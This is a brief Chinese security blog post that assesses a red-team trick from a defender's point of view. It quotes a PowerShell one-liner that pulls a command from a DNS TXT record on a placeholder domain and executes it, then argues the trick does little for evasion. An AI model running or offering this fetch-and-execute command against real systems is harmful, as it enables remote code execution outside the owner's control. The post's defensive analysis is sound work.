微信公众号:绝对防御局
关注可了解更多关于 红蓝对抗、安全防御等安全tips ;
有任何的问题或建议,欢迎公众号留言;
刚刷到一篇文章 具体可看原文: https://www.thecyberidiots.com/post/fun-with-powershell-executing-commands-with-dns-requests
简单说下就是有个红队的小tip,可以通过执行如下命令:利用powershell调用外部dns来控制命令执行进而来规避检测
PowerShell . (nslookup -q=txt <dns.TXTrecord.com>)[-1]
想起类似的上个月也看到过这个“很酷”的demo:
当时着手验证了下,手头没域名简单本地跑个类似的试试,本质上来说括号里面内容可控随便什么命令都行,1.txt 内容为iex whoami
但从蓝队的角度看,真正执行命令为实际的cmdlet参数调用(一览无余)。
所以某些看起来很花哨的东西可能对于实际防御规避并没啥作用,该命令可能唯一的作用是由于域名内容可控,攻击者可以根据不同阶段进行修改执行。
该文作者也同样提到
说字数不够好奇怪说字数不够好奇怪说字数不够好奇怪
原文始发于微信公众号(绝对防御局):【随笔】有些东西看起来很花哨,可能实际并没啥用。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论